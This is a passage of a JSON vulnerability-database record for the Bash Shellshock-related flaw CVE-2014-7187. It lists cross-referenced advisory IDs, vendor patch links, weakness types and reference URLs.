"OSS-SECURITY/2014/09/28/10", "trust": 2.5 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/09/26/2", "trust": 2.5 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/09/25/32", "trust": 2.5 }, { "db": "JVN", "id": "JVNVU97219505", "trust": 1.6 }, { "db": "JVN", "id": "JVNVU97220341", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2014-004433", "trust": 1.6 }, { "db": "MCAFEE", "id": "SB10085", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10648", "trust": 1.4 }, { "db": "PACKETSTORM", "id": "128517", "trust": 1.2 }, { "db": "SECUNIA", "id": "61065", "trust": 1.1 }, { "db": "SECUNIA", "id": "61622", "trust": 1.1 }, { "db": "SECUNIA", "id": "61603", "trust": 1.1 }, { "db": "SECUNIA", "id": "61287", "trust": 1.1 }, { "db": "SECUNIA", "id": "61643", "trust": 1.1 }, { "db": "SECUNIA", "id": "61618", "trust": 1.1 }, { "db": "SECUNIA", "id": "60433", "trust": 1.1 }, { "db": "SECUNIA", "id": "61188", "trust": 1.1 }, { "db": "SECUNIA", "id": "61565", "trust": 1.1 }, { "db": "SECUNIA", "id": "61312", "trust": 1.1 }, { "db": "SECUNIA", "id": "61703", "trust": 1.1 }, { "db": "SECUNIA", "id": "61503", "trust": 1.1 }, { "db": "SECUNIA", "id": "61479", "trust": 1.1 }, { "db": "SECUNIA", "id": "60034", "trust": 1.1 }, { "db": "SECUNIA", "id": "60044", "trust": 1.1 }, { "db": "SECUNIA", "id": "61328", "trust": 1.1 }, { "db": "SECUNIA", "id": "59907", "trust": 1.1 }, { "db": "SECUNIA", "id": "61129", "trust": 1.1 }, { "db": "SECUNIA", "id": "60024", "trust": 1.1 }, { "db": "SECUNIA", "id": "61633", "trust": 1.1 }, { "db": "SECUNIA", "id": "61128", "trust": 1.1 }, { "db": "SECUNIA", "id": "61313", "trust": 1.1 }, { "db": "SECUNIA", "id": "60055", "trust": 1.1 }, { "db": "SECUNIA", "id": "61855", "trust": 1.1 }, { "db": "SECUNIA", "id": "61291", "trust": 1.1 }, { "db": "SECUNIA", "id": "62343", "trust": 1.1 }, { "db": "SECUNIA", "id": "61641", "trust": 1.1 }, { "db": "SECUNIA", "id": "61857", "trust": 1.1 }, { "db": "SECUNIA", "id": "61816", "trust": 1.1 }, { "db": "SECUNIA", "id": "62312", "trust": 1.1 }, { "db": "SECUNIA", "id": "60193", "trust": 1.1 }, { "db": "SECUNIA", "id": "60063", "trust": 1.1 }, { "db": "SECUNIA", "id": "61873", "trust": 1.1 }, { "db": "SECUNIA", "id": "58200", "trust": 1.1 }, { "db": "SECUNIA", "id": "61636", "trust": 1.1 }, { "db": "SECUNIA", "id": "61654", "trust": 1.1 }, { "db": "SECUNIA", "id": "61550", "trust": 1.1 }, { "db": "SECUNIA", "id": "61283", "trust": 1.1 }, { "db": "SECUNIA", "id": "61485", "trust": 1.1 }, { "db": "SECUNIA", "id": "61442", "trust": 1.1 }, { "db": "SECUNIA", "id": "61552", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "128567", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU96447236", "trust": 0.8 }, { "db": "USCERT", "id": "TA14-268A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004431", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004476", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004399", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004410", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004432", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-14-269-01A", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-15-344-01", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201409-1073", "trust": 0.6 }, { "db": "BID", "id": "70154", "trust": 0.4 }, { "db": "JUNIPER", "id": "JSA10661", "trust": 0.3 }, { "db": "EXPLOIT-DB", "id": "36933", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-7187", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130988", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128864", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128752", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128666", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129132", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129264", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128763", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129095", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130335", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128456", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128755", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7187" }, { "db": "BID", "id": "70154" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128864" }, { "db": "PACKETSTORM", "id": "128752" }, { "db": "PACKETSTORM", "id": "128666" }, { "db": "PACKETSTORM", "id": "129132" }, { "db": "PACKETSTORM", "id": "129264" }, { "db": "PACKETSTORM", "id": "128763" }, { "db": "PACKETSTORM", "id": "129095" }, { "db": "PACKETSTORM", "id": "130335" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128517" }, { "db": "PACKETSTORM", "id": "128755" }, { "db": "CNNVD", "id": "CNNVD-201409-1073" }, { "db": "NVD", "id": "CVE-2014-7187" } ] }, "id": "VAR-201409-1148", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4019157454999999 }, "last_update_date": "2024-07-23T20:33:04.791000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NAS-201410-05", "trust": 1.6, "url": "http://www.qnap.com/i/en/support/con_show.php?cid=61" }, { "title": "APPLE-SA-2015-09-30-3 OS X El Capitan 10.11", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00008.html" }, { "title": "APPLE-SA-2015-01-27-4", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/jan/msg00003.html" }, { "title": "HT205267", "trust": 0.8, "url": "https://support.apple.com/en-us/ht205267" }, { "title": "HT204244", "trust": 0.8, "url": "http://support.apple.com/en-us/ht204244" }, { "title": "HT204244", "trust": 0.8, "url": "http://support.apple.com/ja-jp/ht204244" }, { "title": "HT205267", "trust": 0.8, "url": "http://support.apple.com/ja-jp/ht205267" }, { "title": "bash-3.2-33.AXS3.4", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=3918" }, { "title": "bash-4.1.2-15.AXS4.2", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=3919" }, { "title": "cisco-sa-20140926-bash", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash" }, { "title": "CTX200223", "trust": 0.8, "url": "https://support.citrix.com/article/ctx200223" }, { "title": "CTX200217", "trust": 0.8, "url": "https://support.citrix.com/article/ctx200217" }, { "title": "GNU Bash", "trust": 0.8, "url": "http://www.gnu.org/software/bash/" }, { "title": "HPSBMU03143 SSRT101761", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04479536" }, { "title": "HPSBMU03144 SSRT101762", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04479492" }, { "title": "HPSBMU03182 SSRT101787", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04497042" }, { "title": "HPSBHF03125 SSRT101724", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04471538" }, { "title": "HPSBST03131 SSRT101749", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04477872" }, { "title": "HPSBST03154 SSRT101747", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04487558" }, { "title": "HPSBGN03233", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04540692" }, { "title": "HPSBGN03138 SSRT101755", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04475942" }, { "title": "HPSBST03129 SSRT101760", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04478866" }, { "title": "HPSBST03181 SSRT101811", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04496383" }, { "title": "HPSBMU03217 SSRT101827", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04512907" }, { "title": "HPSBGN03142 SSRT101764", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04479402" }, { "title": "HPSBMU03165 SSRT101783", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04497075" }, { "title": "HPSBMU03236 SSRT101830", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04552143" }, { "title": "HPSBGN03141 SSRT101763", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04479398" }, { "title": "HPSBST03157 SSRT101718", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04488200" }, { "title": "HPSBST03155 SSRT101747", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04487573" }, { "title": "HPSBMU03245 SSRT101742", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04556845" }, { "title": "HPSBST03148 SSRT101749", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04479974" }, { "title": "HPSBMU03246 SSRT101743", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04558068" }, { "title": "1685541", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685541" }, { "title": "1685604", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685604" }, { "title": "S1004915", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915" }, { "title": "1685733", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685733" }, { "title": "T1021272", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272" }, { "title": "1686131", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686131" }, { "title": "S1004879", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "title": "MIGR-5096315", "trust": 0.8, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315" }, { "title": "S1004897", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897" }, { "title": "1685749", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685749" }, { "title": "S1004898", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898" }, { "title": "1685433", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685433" }, { "title": "1685914", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685914" }, { "title": "1686479", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686479" }, { "title": "1685522", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685522" }, { "title": "T1021279", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279" }, { "title": "1686447", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686447" }, { "title": "1686084", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686084" }, { "title": "1686493", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686493" }, { "title": "1685798", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685798" }, { "title": "1686299", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686299" }, { "title": "1686635", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686635" }, { "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831", "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97219505/522154/index.html" }, { "title": "ZENworks Configuration Management vulnerability with GNU Bash Remote Code Execution (aka ShellShock)", "trust": 0.8, "url": "https://www.novell.com/support/kb/doc.php?id=7015721" }, { "title": "OES11 SP2, OES11SP1, OES2 SP3 vulnerability with GNU Bash Remote Code Execution (aka ShellShock) and Mozilla NSS vulnerabilities", "trust": 0.8, "url": "http://www.novell.com/support/kb/doc.php?id=7015701" }, { "title": "AV14-003", "trust": 0.8, "url": "http://jpn.nec.com/security-info/av14-003.html" }, { "title": "Bash \"Shellshock\" Vulnerabilities - CVE-2014-7169", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html" }, { "title": "Bug 1141597", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1141597" }, { "title": "Resolution for Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271, CVE-2014-7169) in Red Hat Enterprise Linux", "trust": 0.8, "url": "https://access.redhat.com/solutions/1207723" }, { "title": "RHSA-2014:1354", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-1354.html" }, { "title": "RHSA-2014:1306", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-1306.html" }, { "title": "Bash specially-crafted environment variables code injection attack", "trust": 0.8, "url": "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/" }, { "title": "GNU Bash \u300cOS \u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u300d\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu252743.html" }, { "title": "SA82", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa82" }, { "title": "SOL15629", "trust": 0.8, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html" }, { "title": "Multiple vulnerabilities in Bash", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash" }, { "title": "JSA10648", "trust": 0.8, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10648" }, { "title": "VMSA-2014-0010", "trust": 0.8, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0010.html" }, { "title": "GNU bash \u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u5f0a\u793e\u8abf\u67fb\u30fb\u5bfe\u5fdc\u72b6\u6cc1\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.iodata.jp/support/information/2014/bash/" }, { "title": "bash\u306e\u8106\u5f31\u6027(CVE-2014-6271,CVE-2014-7169 \u4ed6)\u306b\u3088\u308bHA8500\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/bash_ha8500.html" }, { "title": "\u30b5\u30fc\u30d0\u30fb\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u88fd\u54c1 bash\u306e\u8106\u5f31\u6027(CVE-2014-6271,CVE-2014-7169\u4ed6)\u306b\u3088\u308b\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/bash_cve20146271.html" }, { "title": "cisco-sa-20140926-bash", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1126/1126247_cisco-sa-20140926-bash-j.html" }, { "title": "TLSA-2014-9", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2014/tlsa-2014-9j.html" }, { "title": "GNU Bash\u306b\u304a\u3051\u308bOS\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20141002.html" }, { "title": "GNU Bash \u306b OS \u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027", "trust": 0.8, "url": "http://software.fujitsu.com/jp/security/vulnerabilities/jvn-97219505.html" }, { "title": "bash4.1.2-15.el6_5.2.x86_64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=54163" }, { "title": "bash-4.2-cve-2014-7169-2", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=54162" }, { "title": "Ubuntu Security Notice: bash vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2364-1" }, { "title": "Red Hat: CVE-2014-7187", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-7187" }, { "title": "Amazon Linux AMI: ALAS-2014-419", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-419" }, { "title": "VMware Security Advisories: VMware product updates address critical Bash security vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=86cb6b3955e100fdc9667a7ca916c772" }, { "title": "Symantec Security Advisories: SA82 : GNU Bash Shellshock Command Injection Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=2b57ceaadfde2a8b03482273e1fd21ea" }, { "title": "Apple: OS X Yosemite v10.10.2 and Security Update 2015-001", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=64cbe709a7be49c91d8a8b0f43621640" }, { "title": "Tenable Security Advisories: [R7] Tenable Appliance Affected by GNU bash \u0027Shellshock\u0027 Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-07" }, { "title": "Citrix Security Bulletins: Citrix XenServer Shellshock Security Update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=64ae0aae8269062686789e3a3fa1d2bf" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=73443a6db89dc66fc6bcb49f85bfd1ab" }, { "title": "Apple: OS X El Capitan v10.11", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=e88bab658248444f5dffc23fd95859e7" }, { "title": "Shell-Shock-Update", "trust": 0.1, "url": "https://github.com/umdterps/shell-shock-update " }, { "title": "fabric-shellshock", "trust": 0.1, "url": "https://github.com/ericlake/fabric-shellshock " }, { "title": "dokku-alt", "trust": 0.1, "url": "https://github.com/dokku-alt/dokku-alt " }, { "title": "patch-bash-shellshock", "trust": 0.1, "url": "https://github.com/jdauphant/patch-bash-shellshock " }, { "title": "w-test", "trust": 0.1, "url": "https://github.com/inspirion87/w-test " }, { "title": "linux-pentest", "trust": 0.1, "url": "https://github.com/ankh2054/linux-pentest " }, { "title": "shocktrooper", "trust": 0.1, "url": "https://github.com/evank/shocktrooper " }, { "title": "ShellShockHunter", "trust": 0.1, "url": "https://github.com/mrcl0wnlab/shellshockhunter " }, { "title": "shellshockFixOSX", "trust": 0.1, "url": "https://github.com/opragel/shellshockfixosx " }, { "title": "Xpl-SHELLSHOCK-Ch3ck", "trust": 0.1, "url": "https://github.com/googleinurl/xpl-shellshock-ch3ck " }, { "title": "bashcheck", "trust": 0.1, "url": "https://github.com/hannob/bashcheck " }, { "title": "shellshocker-pocs", "trust": 0.1, "url": "https://github.com/mubix/shellshocker-pocs " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674/" }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/vmware-begins-to-patch-bash-issues-across-product-line/108632/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7187" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "CNNVD", "id": "CNNVD-201409-1073" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 }, { "problemtype": "OS Command injection (CWE-78) [IPA evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "NVD", "id": "CVE-2014-7187" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://openwall.com/lists/oss-security/2014/09/28/10" }, { "trust": 2.5, "url": "http://openwall.com/lists/oss-security/2014/09/25/32" }, { "trust": 2.5, "url": "http://openwall.com/lists/oss-security/2014/09/26/2" }, { "trust": 2.2, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash" }, { "trust": 2.2, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10085" }, { "trust": 1.9, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa82" }, { "trust": 1.9, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html" }, { "trust": 1.7, "url": "http://www.kb.cert.org/vuls/id/252743" }, { "trust": 1.6, "url": "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/" }, { "trust": 1.6, "url": "http://www.ipa.go.jp/security/ciadr/vul/20140926-bash.html" }, { "trust": 1.6, "url": "http://jvn.jp/jp/jvn55667175/index.html" }, { "trust": 1.6, "url": "http://jvn.jp/vu/jvnvu97219505/index.html" }, { "trust": 1.6, "url": "http://jvn.jp/vu/jvnvu97220341/index.html" }, { "trust": 1.6, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-7187" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2014-1311.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2014-1312.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685749" }, { "trust": 1.4, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10648" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685914" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272" }, { "trust": 1.4, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0010.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686084" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685604" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686131" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686246" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687079" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7186" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7169" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7187" }, { "trust": 1.1, "url": "https://www.suse.com/support/shellshock/" }, { "trust": 1.1, "url": "http://support.novell.com/security/cve/cve-2014-7187.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61479" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61641" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61618" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61622" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61636" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00041.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00038.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00042.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2364-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00048.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61485" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59907" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61654" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128567/ca-technologies-gnu-bash-shellshock.html" }, { "trust": 1.1, "url": "http://www.novell.com/support/kb/doc.php?id=7015721" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61565" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61643" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61503" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61633" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61552" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61703" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2014/oct/0" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61283" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61603" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128517/vmware-security-advisory-2014-0010.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141330468527613\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61188" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141345648114150\u0026w=2" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx200217" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60034" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61816" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61128" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61313" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685733" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61442" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61287" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx200223" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60055" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61129" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686479" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58200" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61328" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61857" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60193" 